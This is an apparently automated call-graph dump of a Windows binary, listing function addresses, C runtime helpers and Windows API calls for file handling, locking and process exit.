f678a9 20249->20251 20252 f5e619 __dosmaperr 14 API calls 20250->20252 20253 f678b1 20251->20253 20254 f678c8 20251->20254 20257 f67894 20252->20257 20255 f5e619 __dosmaperr 14 API calls 20253->20255 20256 f5c80e _mbstowcs 37 API calls 20254->20256 20258 f678b6 20255->20258 20263 f678d3 20256->20263 20259 f63b33 _mbstowcs 25 API calls 20257->20259 20260 f63b33 _mbstowcs 25 API calls 20258->20260 20262 f6789f 20259->20262 20260->20262 20261 f677f7 38 API calls 20261->20263 20262->20244 20263->20261 20263->20262 20265 f5ef43 20264->20265 20266 f5ef49 20265->20266 20274 f5ec41 20265->20274 20268 f596fa _ValidateLocalCookies 5 API calls 20266->20268 20269 f5e8d9 20268->20269 20269->20188 20269->20189 20270 f5efac 20271 f5e365 ___vcrt_freefls@4 14 API calls 20270->20271 20271->20266 20272 f5ef6f 20272->20270 20273 f5ef9e GetDriveTypeW 20272->20273 20273->20270 20275 f5e619 __dosmaperr 14 API calls 20274->20275 20276 f5ec4d 20275->20276 20277 f5e619 __dosmaperr 14 API calls 20276->20277 20278 f5ec54 20277->20278 20279 f5f3be 34 API calls 20278->20279 20280 f5ec65 20279->20280 20281 f5e619 __dosmaperr 14 API calls 20280->20281 20282 f5ec6f 20281->20282 20283 f5ec73 20282->20283 20284 f5e619 __dosmaperr 14 API calls 20282->20284 20283->20272 20285 f5ec87 20284->20285 20286 f5f3be 34 API calls 20285->20286 20286->20283 20290 f67081 20287->20290 20291 f671b0 __dosmaperr 5 API calls 20290->20291 20292 f67097 20291->20292 20292->20154 20294 f5e6d4 20293->20294 20295 f5e6ba 20293->20295 20297 f5e6db 20294->20297 20298 f5e6fa 20294->20298 20311 f5ebc9 20295->20311 20302 f5e6c4 20297->20302 20315 f5ebe3 20297->20315 20299 f67937 _mbstowcs MultiByteToWideChar 20298->20299 20301 f5e709 20299->20301 20303 f5e710 GetLastError 20301->20303 20304 f5e736 20301->20304 20306 f5ebe3 15 API calls 20301->20306 20302->20124 20302->20125 20305 f5e5e3 __dosmaperr 14 API calls 20303->20305 20304->20302 20307 f67937 _mbstowcs MultiByteToWideChar 20304->20307 20308 f5e71c 20305->20308 20306->20304 20310 f5e74d 20307->20310 20309 f5e619 __dosmaperr 14 API calls 20308->20309 20309->20302 20310->20302 20310->20303 20312 f5ebd4 20311->20312 20313 f5ebdc 20311->20313 20314 f63b77 _free 14 API calls 20312->20314 20313->20302 20314->20313 20316 f5ebc9 14 API calls 20315->20316 20317 f5ebf1 20316->20317 20320 f5ec22 20317->20320 20321 f65ba2 __fread_nolock 15 API calls 20320->20321 20322 f5ec02 20321->20322 20322->20302 20414 f683f9 20419 f6818e 20414->20419 20417 f68438 20420 f681bc ___vcrt_FlsSetValue 20419->20420 20420->20420 20429 f6830c 20420->20429 20434 f6dcb4 20420->20434 20421 f5e619 __dosmaperr 14 API calls 20422 f683e7 20421->20422 20423 f63b33 _mbstowcs 25 API calls 20422->20423 20424 f68317 20423->20424 20424->20417 20431 f6e800 20424->20431 20426 f68374 20427 f6dcb4 38 API calls 20426->20427 20426->20429 20428 f68392 20427->20428 20428->20429 20430 f6dcb4 38 API calls 20428->20430 20429->20421 20429->20424 20430->20429 20459 f6df09 20431->20459 20435 f6dcc2 20434->20435 20436 f6dce5 20434->20436 20435->20436 20437 f6dcc8 20435->20437 20444 f6dd00 20436->20444 20439 f5e619 __dosmaperr 14 API calls 20437->20439 20441 f6dccd 20439->20441 20440 f6dcfb 20440->20426 20442 f63b33 _mbstowcs 25 API calls 20441->20442 20443 f6dcd8 20442->20443 20443->20426 20445 f6dd10 20444->20445 20446 f6dd2a 20444->20446 20447 f5e619 __dosmaperr 14 API calls 20445->20447 20448 f6dd32 20446->20448 20449 f6dd4c 20446->20449 20450 f6dd15 20447->20450 20451 f5e619 __dosmaperr 14 API calls 20448->20451 20454 f5c80e _mbstowcs 37 API calls 20449->20454 20456 f6dd20 20449->20456 20452 f63b33 _mbstowcs 25 API calls 20450->20452 20453 f6dd37 20451->20453 20452->20456 20455 f63b33 _mbstowcs 25 API calls 20453->20455 20458 f6dd63 20454->20458 20455->20456 20456->20440 20457 f677f7 38 API calls 20457->20458 20458->20456 20458->20457 20462 f6df15 ___scrt_is_nonwritable_in_current_image 20459->20462 20460 f6df1c 20461 f5e619 __dosmaperr 14 API calls 20460->20461 20463 f6df21 20461->20463 20462->20460 20464 f6df47 20462->20464 20465 f63b33 _mbstowcs 25 API calls 20463->20465 20470 f6e4d6 20464->20470 20469 f6df2b 20465->20469 20469->20417 20521 f6e2b2 20470->20521 20473 f6e521 20539 f60904 20473->20539 20474 f6e508 20475 f5e606 __dosmaperr 14 API calls 20474->20475 20478 f6e50d 20475->20478 20482 f5e619 __dosmaperr 14 API calls 20478->20482 20479 f6e546 20550 f6e21d CreateFileW 20479->20550 20480 f6e52f 20483 f5e606 __dosmaperr 14 API calls 20480->20483 20484 f6df6b 20482->20484 20485 f6e534 20483->20485 20517 f6df9e 20484->20517 20487 f5e619 __dosmaperr 14 API calls 20485->20487 20486 f6e5fc GetFileType 20489 f6e607 GetLastError 20486->20489 20490 f6e64e 20486->20490 20487->20478 20488 f6e5d1 GetLastError 20492 f5e5e3 __dosmaperr 14 API calls 20488->20492 20493 f5e5e3 __dosmaperr 14 API calls 20489->20493 20552 f6084f 20490->20552 20491 f6e57f 20491->20486 20491->20488 20551 f6e21d CreateFileW 20491->20551 20492->20478 20495 f6e615 CloseHandle 20493->20495 20495->20478 20498 f6e63e 20495->20498 20497 f6e5c4 20497->20486 20497->20488 20499 f5e619 __dosmaperr 14 API calls 20498->20499 20501 f6e643 20499->20501 20501->20478 20502 f6e6bb 20507 f6e6c2 20502->20507 20576 f6dfca 20502->20576 20506 f6e6fe 20506->20484 20509 f6e77a CloseHandle 20506->20509 20508 f63cca __wsopen_s 28 API calls 20507->20508 20508->20484 20602 f6e21d CreateFileW 20509->20602 20518 f6dfa4 20517->20518 20519 f6dfc8 20517->20519 20663 f608e1 LeaveCriticalSection 20518->20663 20519->20469 20522 f6e2d3 20521->20522 20523 f6e2ed 20521->20523 20522->20523 20526 f5e619 __dosmaperr 14 API calls 20522->20526 20603 f6e242 20523->20603 20525 f6e325 20529 f6e354 20525->20529 20531 f5e619 __dosmaperr 14 API calls 20525->20531 20527 f6e2e2 20526->20527 20528 f63b33 _mbstowcs 25 API calls 20527->20528 20528->20523 20537 f6e3a7 20529->20537 20610 f5f676 20529->20610 20533 f6e349 20531->20533 20532 f6e3a2 20534 f6e41f 20532->20534 20532->20537 20535 f63b33 _mbstowcs 25 API calls 20533->20535 20536 f63b43 __wsopen_s 11 API calls 20534->20536 20535->20529 20538 f6e42b 20536->20538 20537->20473 20537->20474 20540 f60910 ___scrt_is_nonwritable_in_current_image 20539->20540 20617 f68793 EnterCriticalSection 20540->20617 20542 f6095e 20618 f60a0e 20542->20618 20543 f60917 20543->20542 20546 f609ab EnterCriticalSection 20543->20546 20547 f6093c 20543->20547 20546->20542 20548 f609b8 LeaveCriticalSection 20546->20548 20547->20542 20621 f6082c EnterCriticalSection 20547->20621 20548->20543 20550->20491 20551->20497 20553 f608c7 20552->20553 20554 f6085e 20552->20554 20555 f5e619 __dosmaperr 14 API calls 20553->20555 20554->20553 20560 f60884 __wsopen_s 20554->20560 20556 f608cc 20555->20556 20557 f5e606 __dosmaperr 14 API calls 20556->20557 20558 f608b4 20557->20558 20558->20502 20561 f6e42c 20558->20561 20559 f608ae SetStdHandle 20559->20558 20560->20558 20560->20559 20562 f6e454 20561->20562 20574 f6e486 20561->20574 20563 f64bdd __fread_nolock 27 API calls 20562->20563 20562->20574 20564 f6e464 20563->20564 20565 f6e474 20564->20565 20566 f6e48a 20564->20566 20567 f5e606 __dosmaperr 14 API calls 20565->20567 20568 f644f5 __fread_nolock 37 API calls 20566->20568 20574->20502 20577 f6dffa 20576->20577 20578 f6e156 20576->20578 20579 f5f676 __wsopen_s 25 API calls 20577->20579 20584 f6e01a 20577->20584 20578->20506 20578->20507 20580 f6e011 20579->20580 20581 f6e212 20580->20581 20580->20584 20584->20578 20586 f6e0ce 20584->20586 20587 f64bdd __fread_nolock 27 API calls 20584->20587 20585 f644f5 __fread_nolock 37 API calls 20586->20578 20586->20585 20588 f6e151 20586->20588 20596 f6e121 20586->20596 20589 f6e135 20587->20589 20589->20596 20596->20578 20596->20588 20606 f6e25a 20603->20606 20604 f6e275 20604->20525 20605 f5e619 __dosmaperr 14 API calls 20607 f6e299 20605->20607 20606->20604 20606->20605 20608 f63b33 _mbstowcs 25 API calls 20607->20608 20609 f6e2a4 20608->20609 20609->20525 20611 f5f697 20610->20611 20612 f5f682 20610->20612 20611->20532 20613 f5e619 __dosmaperr 14 API calls 20612->20613 20614 f5f687 20613->20614 20615 f63b33 _mbstowcs 25 API calls 20614->20615 20616 f5f692 20615->20616 20616->20532 20617->20543 20622 f687db LeaveCriticalSection 20618->20622 20620 f6097e 20620->20479 20620->20480 20621->20542 20622->20620 20663->20519 21733 f64d62 21734 f64d6e ___scrt_is_nonwritable_in_current_image 21733->21734 21745 f68793 EnterCriticalSection 21734->21745 21736 f64d75 21746 f6078e 21736->21746 21739 f64d93 21768 f64db9 21739->21768 21745->21736 21747 f6079a ___scrt_is_nonwritable_in_current_image 21746->21747 21748 f607c4 21747->21748 21749 f607a3 21747->21749 21771 f68793 EnterCriticalSection 21748->21771 21750 f5e619 __dosmaperr 14 API calls 21749->21750 21752 f607a8 21750->21752 21753 f63b33 _mbstowcs 25 API calls 21752->21753 21754 f607b2 21753->21754 21754->21739 21757 f64bf8 GetStartupInfoW 21754->21757 21755 f607d0 21772 f60823 21755->21772 21758 f64c15 21757->21758 21759 f64ca9 21757->21759 21758->21759 21760 f6078e 25 API calls 21758->21760 21763 f64cae 21759->21763 21761 f64c3d 21760->21761 21761->21759 21762 f64c6d GetFileType 21761->21762 21762->21761 21765 f64cb5 21763->21765 21764 f64cf8 GetStdHandle 21764->21765 21765->21764 21766 f64d5e 21765->21766 21767 f64d0b GetFileType 21765->21767 21766->21739 21767->21765 21776 f687db LeaveCriticalSection 21768->21776 21770 f64da4 21771->21755 21775 f687db LeaveCriticalSection 21772->21775 21774 f6082a 21774->21754 21775->21774 21776->21770 17589 f53560 17590 f5356a __wsopen_s 17589->17590 17591 f56990 53 API calls 17590->17591 17592 f5358f 17591->17592 17593 f596fa _ValidateLocalCookies 5 API calls 17592->17593 17594 f535b4 17593->17594 20778 f5e4e0 20779 f5fbaa ___scrt_uninitialize_crt 66 API calls 20778->20779 20780 f5e4e8 20779->20780 20788 f67528 20780->20788 20782 f5e4ed 20783 f63ecc 14 API calls 20782->20783 20784 f5e4fc DeleteCriticalSection 20783->20784 20784->20782 20785 f5e517 20784->20785 20786 f63b77 _free 14 API calls 20785->20786 20787 f5e522 20786->20787 20789 f67534 ___scrt_is_nonwritable_in_current_image 20788->20789 20798 f68793 EnterCriticalSection 20789->20798 20791 f675ab 20799 f675ca 20791->20799 20792 f6753f 20792->20791 20794 f6757f DeleteCriticalSection 20792->20794 20796 f5b65c 67 API calls 20792->20796 20797 f63b77 _free 14 API calls 20794->20797 20796->20792 20797->20792 20798->20792 20802 f687db LeaveCriticalSection 20799->20802 20801 f675b7 20801->20782 20802->20801 20323 f61558 20324 f61564 ___scrt_is_nonwritable_in_current_image 20323->20324 20325 f61581 20324->20325 20326 f6156a 20324->20326 20336 f5e52c EnterCriticalSection 20325->20336 20327 f5e619 __dosmaperr 14 API calls 20326->20327 20329 f6156f 20327->20329 20331 f63b33 _mbstowcs 25 API calls 20329->20331 20330 f61591 20337 f615d8 20330->20337 20335 f6157a 20331->20335 20333 f6159d 20358 f615ce 20333->20358 20336->20330 20338 f615e6 20337->20338 20339 f615fd 20337->20339 20340 f5e619 __dosmaperr 14 API calls 20338->20340 20341 f62f81 __fread_nolock 25 API calls 20339->20341 20342 f615eb 20340->20342 20343 f61607 20341->20343 20344 f63b33 _mbstowcs 25 API calls 20342->20344 20361 f64bc2 20343->20361 20345 f615f6 20344->20345 20345->20333 20348 f61695 20351 f616af 20348->20351 20353 f616c3 20348->20353 20349 f616ea 20350 f616f8 20349->20350 20349->20353 20352 f5e619 __dosmaperr 14 API calls 20350->20352 20364 f61915 20351->20364 20354 f6164c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20352->20354 20353->20354 20376 f6175c 20353->20376 20354->20333 20413 f5e540 LeaveCriticalSection 20358->20413 20360 f615d6 20360->20335 20383 f64a3a 20361->20383 20365 f61924 __wsopen_s 20364->20365 20366 f62f81 __fread_nolock 25 API calls 20365->20366 20368 f61937 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20366->20368 20367 f596fa _ValidateLocalCookies 5 API calls 20369 f616bb 20367->20369 20370 f64bc2 29 API calls 20368->20370 20375 f61943 20368->20375 20369->20354 20371 f61991 20370->20371 20372 f619c3 ReadFile 20371->20372 20371->20375 20373 f619ea 20372->20373 20372->20375 20374 f64bc2 29 API calls 20373->20374 20374->20375 20375->20367 20377 f62f81 __fread_nolock 25 API calls 20376->20377 20378 f6176f 20377->20378 20379 f64bc2 29 API calls 20378->20379 20382 f617b7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20378->20382 20380 f61807 20379->20380 20381 f64bc2 29 API calls 20380->20381 20380->20382 20381->20382 20382->20354 20384 f64a46 ___scrt_is_nonwritable_in_current_image 20383->20384 20385 f64a66 20384->20385 20386 f64a4e 20384->20386 20388 f64b17 20385->20388 20392 f64a9b 20385->20392 20387 f5e606 __dosmaperr 14 API calls 20386->20387 20390 f64a53 20387->20390 20389 f5e606 __dosmaperr 14 API calls 20388->20389 20391 f64b1c 20389->20391 20393 f5e619 __dosmaperr 14 API calls 20390->20393 20394 f5e619 __dosmaperr 14 API calls 20391->20394 20408 f6082c EnterCriticalSection 20392->20408 20407 f61622 20393->20407 20396 f64b24 20394->20396 20398 f63b33 _mbstowcs 25 API calls 20396->20398 20397 f64aa1 20399 f64ac5 20397->20399 20400 f64ada 20397->20400 20398->20407 20401 f5e619 __dosmaperr 14 API calls 20399->20401 20402 f64b46 __fread_nolock 27 API calls 20400->20402 20403 f64aca 20401->20403 20404 f64ad5 20402->20404 20405 f5e606 __dosmaperr 14 API calls 20403->20405 20409 f64b0f 20404->20409 20405->20404 20407->20348 20407->20349 20407->20354 20408->20397 20412 f608e1 LeaveCriticalSection 20409->20412 20411 f64b15 20411->20407 20412->20411 20413->20360 21809 f69342 21810 f6934e ___scrt_is_nonwritable_in_current_image 21809->21810 21817 f68793 EnterCriticalSection 21810->21817 21812 f69359 21818 f693a1 21812->21818 21817->21812 21819 f693c7 21818->21819 21820 f693b1 21818->21820 21823 f69422 21819->21823 21824 f693dd 21819->21824 21821 f5e619 __dosmaperr 14 API calls 21820->21821 21822 f693b6 21821->21822 21825 f63b33 _mbstowcs 25 API calls 21822->21825 21826 f5e619 __dosmaperr 14 API calls 21823->21826 21839 f692be 21824->21839 21830 f6936f 21825->21830 21827 f69427 21826->21827 21829 f63b33 _mbstowcs 25 API calls 21827->21829 21829->21830 21836 f69398 21830->21836 21832 f68911 25 API calls 21833 f6943d 21832->21833 21833->21830 21834 f63b43 __wsopen_s 11 API calls 21833->21834 21835 f69457 21834->21835 21843 f687db LeaveCriticalSection 21836->21843 21838 f69383 21841 f692cc 21839->21841 21840 f69332 21840->21830 21840->21832 21841->21840 21842 f6e9c7 38 API calls 21841->21842 21842->21841 21843->21838 16503 f59935 16512 f5a032 GetModuleHandleW 16503->16512 16506 f59941 16508 f5994c 16506->16508 16514 f62849 16506->16514 16507 f59973 16517 f62867 16507->16517 16513 f5993d 16512->16513 16513->16506 16513->16507 16520 f62741 16514->16520 16518 f62741 _mbstowcs 23 API calls 16517->16518 16519 f5997b 16518->16519 16521 f62761 16520->16521 16522 f6274f 16520->16522 16538 f62607 16521->16538 16523 f5a032 _mbstowcs GetModuleHandleW 16522->16523 16525 f62754 16523->16525 16525->16521 16532 f627e7 GetModuleHandleExW 16525->16532 16527 f6279a 16527->16508 16533 f62806 GetProcAddress 16532->16533 16534 f62829 16532->16534 16537 f6281b 16533->16537 16535 f6282f FreeLibrary 16534->16535 16536 f62760 16534->16536 16535->16536 16536->16521 16537->16534 16539 f62613 ___scrt_is_nonwritable_in_current_image 16538->16539 16554 f68793 EnterCriticalSection 16539->16554 16541 f6261d 16555 f62654 16541->16555 16543 f6262a 16559 f62648 16543->16559 16546 f627a5 16615 f6a500 GetPEB 16546->16615 16549 f627d4 16552 f627e7 _mbstowcs 3 API calls 16549->16552 16550 f627b4 GetPEB 16550->16549 16551 f627c4 GetCurrentProcess TerminateProcess 16550->16551 16551->16549 16553 f627dc ExitProcess 16552->16553 16554->16541 16556 f62660 ___scrt_is_nonwritable_in_current_image 16555->16556 16558 f626c1 _mbstowcs 16556->16558 16562 f62cc6 16556->16562 16558->16543 16614 f687db LeaveCriticalSection 16559->16614 16561 f62636 16561->16527 16561->16546 16565 f629f7 16562->16565 16566 f62a03 ___scrt_is_nonwritable_in_current_image 16565->16566 16573 f68793 EnterCriticalSection 16566->16573 16568 f62a11 16574 f62bd6 16568->16574 16573->16568 16575 f62bf5 16574->16575 16576 f62a1e 16574->16576 16575->16576 16581 f63b77 16575->16581 16578 f62a46 16576->16578 16613 f687db LeaveCriticalSection 16578->16613 16580 f62a2f 16580->16558 16582 f63b82 RtlFreeHeap 16581->16582 16583 f63bab __dosmaperr 16581->16583 16582->16583 16584 f63b97 16582->16584 16583->16576 16587 f5e619 16584->16587 16590 f663ab GetLastError 16587->16590 16589 f5e61e GetLastError 16589->16583 16591 f663c2 16590->16591 16592 f663c8 16590->16592 16594 f6736d __dosmaperr 6 API calls 16591->16594 16593 f673ac __dosmaperr 6 API calls 16592->16593 16611 f663ce SetLastError 16592->16611 16595 f663e6 16593->16595 16594->16592 16596 f67024 __dosmaperr 12 API calls 16595->16596 16595->16611 16598 f663f6 16596->16598 16599 f66415 16598->16599 16600 f663fe 16598->16600 16601 f673ac __dosmaperr 6 API calls 16599->16601 16602 f673ac __dosmaperr 6 API calls 16600->16602 16603 f66421 16601->16603 16604 f6640c 16602->16604 16605 f66436 16603->16605 16606 f66425 16603->16606 16609 f63b77 _free 12 API calls 16604->16609 16608 f66082 __dosmaperr 12 API calls 16605->16608 16607 f673ac __dosmaperr 6 API calls 16606->16607 16607->16604 16610 f66441 16608->16610 16609->16611 16612 f63b77 _free 12 API calls 16610->16612 16611->16589 16612->16611 16613->16580 16614->16561 16616 f6a51a 16615->16616 16617 f627af 16615->16617 16619 f67233 16616->16619 16617->16549 16617->16550 16622 f671b0 16619->16622 16623 f671de 16622->16623 16628 f671da 16622->16628 16623->16628 16629 f670e9 16623->16629 16626 f671f8 GetProcAddress 16627 f67208 __dosmaperr 16626->16627 16626->16628 16627->16628 16628->16617 16634 f670fa ___vcrt_FlsSetValue 16629->16634 16630 f671a5 16630->16626 16630->16628 16631 f67118 LoadLibraryExW 16632 f67133 GetLastError 16631->16632 16631->16634 16632->16634 16633 f6718e FreeLibrary 16633->16634 16634->16630 16634->16631 16634->16633 16635 f67166 LoadLibraryExW 16634->16635 16635->16634 21057 f695b4 21068 f6ec7a 21057->21068 21059 f695b9 ___scrt_is_nonwritable_in_current_image 21074 f68793 EnterCriticalSection 21059->21074 21061 f69638 21079 f69657 21061->21079 21065 f695d5 21065->21061 21067 f5b5e5 65 API calls 21065->21067 21075 f5e52c EnterCriticalSection 21065->21075 21076 f6962e 21065->21076 21067->21065 21069 f6ec95 21068->21069 21070 f63b77 _free 14 API calls 21069->21070 21071 f6eca8 21069->21071 21070->21069 21072 f63b77 _free 14 API calls 21071->21072 21073 f6ecd1 21071->21073 21072->21071 21073->21059 21074->21065 21075->21065 21082 f5e540 LeaveCriticalSection 21076->21082 21078 f69636 21078->21065 21083 f687db LeaveCriticalSection 21079->21083 21081 f69644 21082->21078 21083->21081 21891 f62932 21894 f628b9 21891->21894 21895 f628c5 ___scrt_is_nonwritable_in_current_image 21894->21895 21902 f68793 EnterCriticalSection 21895->21902 21897 f628fd 21903 f6291b 21897->21903 21898 f628cf 21898->21897 21900 f6ac46 _mbstowcs 14 API calls 21898->21900 21900->21898 21902->21898 21906 f687db LeaveCriticalSection 21903->21906 21905 f62909 21906->21905 21907 f5973b 21908 f59743 21907->21908 21924 f5f6a3 21908->21924 21910 f5974e 21931 f59c32 21910->21931 21912 f59ee1 4 API calls 21914 f597e5 21912->21914 21913 f59763 __RTC_Initialize 21922 f597c0 21913->21922 21937 f59dbf 21913->21937 21916 f5977c 21916->21922 21940 f59e76 InitializeSListHead 21916->21940 21918 f59792 21941 f59e85 21918->21941 21920 f597b5 21947 f62959 21920->21947 21922->21912 21923 f597dd 21922->21923 21925 f5f6d5 21924->21925 21926 f5f6b2 21924->21926 21925->21910 21926->21925 21927 f5e619 __dosmaperr 14 API calls 21926->21927 21928 f5f6c5 21927->21928 21929 f63b33 _mbstowcs 25 API calls 21928->21929 21930 f5f6d0 21929->21930 21930->21910 21932 f59c42 21931->21932 21933 f59c3e 21931->21933 21934 f59ee1 4 API calls 21932->21934 21936 f59c4f ___scrt_release_startup_lock 21932->21936 21933->21913 21935 f59cb8 21934->21935 21936->21913 21954 f59d92 21937->21954 21940->21918 21989 f62e8c 21941->21989 21943 f59e9d 21943->21920 21944 f59e96 21944->21943 21945 f59ee1 4 API calls 21944->21945 21946 f59ea5 21945->21946 21948 f66254 _mbstowcs 37 API calls 21947->21948 21949 f62964 21948->21949 21950 f5e619 __dosmaperr 14 API calls 21949->21950 21953 f6299c 21949->21953 21951 f62991 21950->21951 21952 f63b33 _mbstowcs 25 API calls 21951->21952 21952->21953 21953->21922 21955 f59da1 21954->21955 21956 f59da8 21954->21956 21960 f62cb0 21955->21960 21963 f62d1c 21956->21963 21959 f59da6 21959->21916 21961 f62d1c 28 API calls 21960->21961 21962 f62cc2 21961->21962 21962->21959 21966 f62a52 21963->21966 21967 f62a5e ___scrt_is_nonwritable_in_current_image 21966->21967 21974 f68793 EnterCriticalSection 21967->21974 21969 f62a6c 21975 f62aad 21969->21975 21971 f62a79 21985 f62aa1 21971->21985 21974->21969 21976 f62ac9 21975->21976 21981 f62b40 __dosmaperr 21975->21981 21977 f62b20 21976->21977 21978 f6ac96 28 API calls 21976->21978 21976->21981 21979 f6ac96 28 API calls 21977->21979 21977->21981 21980 f62b16 21978->21980 21982 f62b36 21979->21982 21984 f63b77 _free 14 API calls 21980->21984 21981->21971 21983 f63b77 _free 14 API calls 21982->21983 21983->21981 21984->21977 21988 f687db LeaveCriticalSection 21985->21988 21987 f62a8a 21987->21959 21988->21987 21990 f62eaa 21989->21990 21994 f62eca 21989->21994 21991 f5e619 __dosmaperr 14 API calls 21990->21991 21992 f62ec0 21991->21992 21993 f63b33 _mbstowcs 25 API calls 21992->21993 21993->21994 21994->21944 16636 f648a5 16637 f648b2 16636->16637 16640 f648ca 16636->16640 16638 f5e619 __dosmaperr 14 API calls 16637->16638 16639 f648b7 16638->16639 16693 f63b33 16639->16693 16644 f64929 16640->16644 16650 f648c2 16640->16650 16696 f6b494 16640->16696 16656 f62f81 16644->16656 16645 f64941 16663 f643e1 16645->16663 16648 f62f81 __fread_nolock 25 API calls 16649 f64975 16648->16649 16649->16650 16651 f62f81 __fread_nolock 25 API calls 16649->16651 16652 f64983 16651->16652 16652->16650 16653 f62f81 __fread_nolock 25 API calls 16652->16653 16654 f64993 16653->16654 16655 f62f81 __fread_nolock 25 API calls 16654->16655 16655->16650 16657 f62fa2 16656->16657 16658 f62f8d 16656->16658 16657->16645 16659 f5e619 __dosmaperr 14 API calls 16658->16659 16660 f62f92 16659->16660 16661 f63b33 _mbstowcs 25 API calls 16660->16661 16662 f62f9d 16661->16662 16662->16645 16664 f643ed ___scrt_is_nonwritable_in_current_image 16663->16664 16665 f643f5 16664->16665 16666 f6440d 16664->16666 16767 f5e606 16665->16767 16668 f644ca 16666->16668 16672 f64443 16666->16672 16670 f5e606 __dosmaperr 14 API calls 16668->16670 16673 f644cf 16670->16673 16671 f5e619 __dosmaperr 14 API calls 16692 f64402 16671->16692 16674 f64461 16672->16674 16675 f6444c 16672->16675 16676 f5e619 __dosmaperr 14 API calls 16673->16676 16701 f6082c EnterCriticalSection 16674->16701 16678 f5e606 __dosmaperr 14 API calls 16675->16678 16677 f64459 16676->16677 16684 f63b33 _mbstowcs 25 API calls 16677->16684 16681 f64451 16678->16681 16680 f64467 16682 f64483 16680->16682 16683 f64498 16680->16683 16685 f5e619 __dosmaperr 14 API calls 16681->16685 16686 f5e619 __dosmaperr 14 API calls 16682->16686 16702 f644f5 16683->16702 16684->16692 16685->16677 16688 f64488 16686->16688 16690 f5e606 __dosmaperr 14 API calls 16688->16690 16689 f64493 16770 f644c2 16689->16770 16690->16689 16692->16648 16692->16650 16860 f63acf 16693->16860 16695 f63b3f 16695->16650 16886 f67024 16696->16886 16699 f63b77 _free 14 API calls 16700 f6b4bb 16699->16700 16700->16644 16701->16680 16703 f64507 16702->16703 16704 f6451f 16702->16704 16705 f5e606 __dosmaperr 14 API calls 16703->16705 16706 f64886 16704->16706 16711 f6455f 16704->16711 16707 f6450c 16705->16707 16708 f5e606 __dosmaperr 14 API calls 16706->16708 16709 f5e619 __dosmaperr 14 API calls 16707->16709 16710 f6488b 16708->16710 16712 f64514 16709->16712 16713 f5e619 __dosmaperr 14 API calls 16710->16713 16711->16712 16714 f6456a 16711->16714 16718 f64599 16711->16718 16712->16689 16715 f64577 16713->16715 16716 f5e606 __dosmaperr 14 API calls 16714->16716 16719 f63b33 _mbstowcs 25 API calls 16715->16719 16717 f6456f 16716->16717 16720 f5e619 __dosmaperr 14 API calls 16717->16720 16721 f645b2 16718->16721 16722 f645cd 16718->16722 16723 f64609 16718->16723 16719->16712 16720->16715 16721->16722 16757 f645b7 16721->16757 16724 f5e606 __dosmaperr 14 API calls 16722->16724 16773 f65ba2 16723->16773 16726 f645d2 16724->16726 16728 f5e619 __dosmaperr 14 API calls 16726->16728 16731 f645d9 16728->16731 16730 f63b77 _free 14 API calls 16733 f64629 16730->16733 16734 f63b33 _mbstowcs 25 API calls 16731->16734 16732 f64760 16735 f647d6 16732->16735 16738 f64779 GetConsoleMode 16732->16738 16736 f63b77 _free 14 API calls 16733->16736 16764 f645e4 __fread_nolock 16734->16764 16737 f647da ReadFile 16735->16737 16739 f64630 16736->16739 16740 f647f4 16737->16740 16741 f6484e GetLastError 16737->16741 16738->16735 16742 f6478a 16738->16742 16743 f64655 16739->16743 16744 f6463a 16739->16744 16740->16741 16747 f647cb 16740->16747 16745 f647b2 16741->16745 16746 f6485b 16741->16746 16742->16737 16748 f64790 ReadConsoleW 16742->16748 16789 f64bdd 16743->16789 16751 f5e619 __dosmaperr 14 API calls 16744->16751 16745->16764 16792 f5e5e3 16745->16792 16752 f5e619 __dosmaperr 14 API calls 16746->16752 16760 f64830 16747->16760 16761 f64819 16747->16761 16747->16764 16748->16747 16749 f647ac GetLastError 16748->16749 16749->16745 16750 f63b77 _free 14 API calls 16750->16712 16755 f6463f 16751->16755 16756 f64860 16752->16756 16758 f5e606 __dosmaperr 14 API calls 16755->16758 16759 f5e606 __dosmaperr 14 API calls 16756->16759 16780 f6b43e 16757->16780 16758->16764 16759->16764 16763 f64847 16760->16763 16760->16764 16797 f6420f 16761->16797 16810 f64060 16763->16810 16764->16750 16768 f663ab __dosmaperr 14 API calls 16767->16768 16769 f5e60b 16768->16769 16769->16671 16859 f608e1 LeaveCriticalSection 16770->16859 16772 f644c8 16772->16692 16774 f65be0 16773->16774 16778 f65bb0 __dosmaperr 16773->16778 16775 f5e619 __dosmaperr 14 API calls 16774->16775 16777 f64620 16775->16777 16776 f65bcb RtlAllocateHeap 16776->16777 16776->16778 16777->16730 16778->16774 16778->16776 16815 f6adc6 16778->16815 16781 f6b44b 16780->16781 16782 f6b458 16780->16782 16783 f5e619 __dosmaperr 14 API calls 16781->16783 16784 f5e619 __dosmaperr 14 API calls 16782->16784 16785 f6b464 16782->16785 16787 f6b450 16783->16787 16786 f6b485 16784->16786 16785->16732 16788 f63b33 _mbstowcs 25 API calls 16786->16788 16787->16732 16788->16787 16829 f64b46 16789->16829 16793 f5e606 __dosmaperr 14 API calls 16792->16793 16794 f5e5ee __dosmaperr 16793->16794 16795 f5e619 __dosmaperr 14 API calls 16794->16795 16796 f5e601 16795->16796 16796->16764 16851 f63f0c 16797->16851 16801 f64323 16804 f6432c GetLastError 16801->16804 16808 f64257 16801->16808 16802 f642b1 16806 f6426b 16802->16806 16809 f64bdd __fread_nolock 27 API calls 16802->16809 16803 f642a1 16805 f5e619 __dosmaperr 14 API calls 16803->16805 16807 f5e5e3 __dosmaperr 14 API calls 16804->16807 16805->16808 16856 f67937 16806->16856 16807->16808 16808->16764 16809->16806 16813 f6409a 16810->16813 16811 f641de 16811->16764 16812 f64117 ReadFile 16812->16813 16813->16811 16813->16812 16814 f64bdd __fread_nolock 27 API calls 16813->16814 16814->16813 16818 f6adf3 16815->16818 16819 f6adff ___scrt_is_nonwritable_in_current_image 16818->16819 16824 f68793 EnterCriticalSection 16819->16824 16821 f6ae0a 16825 f6ae46 16821->16825 16824->16821 16828 f687db LeaveCriticalSection 16825->16828 16827 f6add1 16827->16778 16828->16827 16838 f60aa8 16829->16838 16831 f64b58 16832 f64b60 16831->16832 16833 f64b71 SetFilePointerEx 16831->16833 16835 f5e619 __dosmaperr 14 API calls 16832->16835 16834 f64b89 GetLastError 16833->16834 16837 f64b65 16833->16837 16836 f5e5e3 __dosmaperr 14 API calls 16834->16836 16835->16837 16836->16837 16837->16757 16839 f60ab5 16838->16839 16840 f60aca 16838->16840 16841 f5e606 